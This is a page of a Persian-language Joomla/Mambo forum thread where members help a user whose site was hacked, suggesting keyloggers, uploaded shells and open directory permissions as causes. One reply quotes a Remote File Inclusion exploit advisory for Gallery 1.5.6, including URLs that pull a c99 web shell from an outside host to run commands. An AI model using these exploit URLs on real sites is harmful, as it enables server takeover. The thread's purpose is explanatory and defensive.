سلام ، آیا این بازدید اول شماست ؟ یا
صفحه 2 از 5 نخستنخست 1234 ... آخرینآخرین
نمایش نتایج: از شماره 11 تا 20 , از مجموع 46

موضوع: سایتم دقایقی پیش هک شد

  1. #11

    تاریخ عضویت
    Mar 2007
    محل سکونت
    تهران
    نوشته ها
    485
    تشکر
    0
    تشکر شده 0 بار در 0 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    فولدر ادمین هم پسورد داشته، بله.
    خوب کامپوننت های زیادی نصبه مثل ریموستری، سایت مپ،یوزر اکستندت و ..

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  2. # ADS
    تبلیغات در جوملا فارسی
    تاریخ عضویت
    Always
    محل سکونت
    Advertising world
    نوشته ها
    Many
     

  3. #12

    تاریخ عضویت
    Jan 2006
    محل سکونت
    زمين
    نوشته ها
    2,373
    تشکر
    0
    تشکر شده 0 بار در 0 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    من حدس میزنم که پسورد شما با روش هایی مثل کی لاگر ها و ... دزدیده شده باشه. چون قطعا وارد شدن به شاخه Administrator ربطی به مامبو نداره

    میتونید این مقاله من رو هم بخونید که شاید کمکتون کنه.

    اميدوارم مورد استفاده قرار بگيره.

    لطفا نظرات و پيشنهادات خودتون رو در خصوص این مقاله به من اعلام كنيد.


    [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]

    ارادتمند.

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  4. #13

    تاریخ عضویت
    Mar 2008
    محل سکونت
    قلب ايران
    نوشته ها
    1,978
    تشکر
    0
    تشکر شده 10 بار در 9 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    سلام.سیامک جان زحمتی که کشیدین قابل تقدیره
    معمولا این گونه کتاب های الکترونیک مخصوصا اگه توسط فرد یا تیم متخصصی نوشته شده باشه خیلی می تونه کمک حال بچه ها باشه.مثل همین مقاله
    من که از این مقاله لذت بردم.

    یــــــــــــــــــــــــ ـــــــــاعــــــــــــــ ـــــــــــــلی

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  5. #14

    تاریخ عضویت
    Jan 2007
    محل سکونت
    تهران
    نوشته ها
    371
    تشکر
    0
    تشکر شده 0 بار در 0 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    سلام

    میدونم که نباید برای تشکر پست بدم ولی کار سیامک جان فوق العاده بود.

    مطالب خیلی مفیدی که برای جمع آوریش زحمت زیادی کشیده اید . واقعا عالی بود.

    از مقاله خوبت ممنون . بازم از این کارا بکن

    موفق باشید
    امیر

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  6. #15

    تاریخ عضویت
    Apr 2008
    محل سکونت
    بیابان
    نوشته ها
    669
    تشکر
    0
    تشکر شده 2 بار در 2 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    من ندیدم چه تغیراتی دادن ولی احتمال میدم که از طریق باگ این کار رو کرده باشه و یک شلر آپلود کرده!!!! به سایت های زیر نگاه کنید.
    این دوستمون از smf هم استفاده کرده.
    [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    اینها هم قبلا توسط همین تیم هک شده

    Attacker : Persian Boys Hacking Team
    Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    Attacker : Persian Boys Hacking Team
    Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    Attacker : Persian Boys Hacking Team
    Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    Attacker : Persian Boys Hacking Team
    Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  7. #16

    تاریخ عضویت
    Apr 2008
    محل سکونت
    بیابان
    نوشته ها
    669
    تشکر
    0
    تشکر شده 2 بار در 2 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    شما ببینید کدوم دایرکتوری ها پرمیژن 777 دارن.بعد محتویاتش رو بررسی کنید.
    یا اینکه یه backup بگیرید و روی لوکال با یه آنتی ویروس up to date مثل کسپر اسکای اسکن کنید چون این آنتی ویروس شل اسکریپت ها رو میشناسه.

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  8. #17

    تاریخ عضویت
    Mar 2007
    محل سکونت
    تهران
    نوشته ها
    485
    تشکر
    0
    تشکر شده 0 بار در 0 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    ببخشید یک شلر آپلود کرده یعنی چی؟
    به smf چه ربطی داره
    آیا هنوز هم میتونه هک کنه برای جلوگیری چه کنم

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  9. #18

    تاریخ عضویت
    Apr 2008
    محل سکونت
    بیابان
    نوشته ها
    669
    تشکر
    0
    تشکر شده 2 بار در 2 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    در بسیاری از مواقع در بعضی cms ها نوعی باگ پیدا میشه با نام RFI یا remote flie inclusion و از این دست....
    با استفاده از این باگ ها نفوزکر میتونه یه یه اسکریپت رو روی سرویس دهنده اجرا کنه مثلا این یه نمونه از باگ های مشهور RFI برای
    ################################################## ######################
    ################################################## ############
    #gallery >> 1.5.6 Remote File Inclusion #
    #Affected Software : gallery >> 1.5.6 #
    #Download..: [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    heanet&filename=gallery-1.5.6.tar.gz&66134343 #
    #Risk ..............: high #
    #Date .........: 24/4/2007 #

    ################################################## ######################
    ################################################## ############
    #Affected File:
    gallery/lib/content.php
    gallery/lib/content.php
    gallery/lib/content.php
    gallery/lib/content.php
    gallery/setup/frame_test.php
    gallery/contrib/joomla/admin.gallery.php
    gallery/contrib/joomla/toolbar.gallery.php
    gallery/contrib/mambo/admin.gallery.php
    gallery/contrib/mambo/toolbar.gallery.php
    gallery/contrib/phpBB2/modules.php
    gallery/contrib/phpBB2/modules.php
    gallery/contrib/phpBB2/modules.php
    gallery/contrib/phpnuke/modules.php.
    gallery/contrib/phpnuke/modules.php.patch
    ################################################## ######################
    ################################################## ##############
    # Exploit:
    [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
    ?cmd=ls
    gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
    gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls
    gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
    gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/c99.tx
    t?cmd=ls
    gallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/c99.
    txt?cmd=ls
    #
    #
    ################################################## ######################
    ################################################## #############
    خوب البته CMS های اپن سورس بیشتر در معرض چنین باگ های هستند.
    در کدهای بالبا اگر دقت کنید C99 اسم شلری است که برای این امر انتخاب شده که اگر نفوذگر حرفه ای باشد میتواند کل سرور را غبضه کند!!!
    توصیه امنیتی: از مد ها و مامبوت های غیر معتبر استفاده نکنید چرا که این باگ ها از یک خطا در کد نویسی ناشی میشود عده زیادی هستند که مامبو را گسترش میدهند ولی جمع قلیلی به موارد امنیتی کد نویسی توجه دارند
    این یک روش از هزاران روش مرسوم برای نفوذگری در وب بود

    یا علی

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  10. #19

    تاریخ عضویت
    Mar 2007
    محل سکونت
    تهران
    نوشته ها
    485
    تشکر
    0
    تشکر شده 0 بار در 0 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    ببخشید! برای جلوگیری الان راه حل ضد هک چیه باید چه مامبوت (غیر معتبر) را حذف کنیم

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


  11. #20

    تاریخ عضویت
    Jan 2006
    محل سکونت
    تهران
    نوشته ها
    6,702
    تشکر
    0
    تشکر شده 32 بار در 30 ارسال

    پاسخ : سایتم دقایقی پیش هک شد

    مطمئنان داشتن اکستنشن های اضاقی از امنتیت سی ام اس میاره پایین این چیزی هست که خود سی ام اس هم بهتون میگه

    اما هاست خوب خیلی در این موارد تاثیر گذار هست

    جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.


صفحه 2 از 5 نخستنخست 1234 ... آخرینآخرین

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •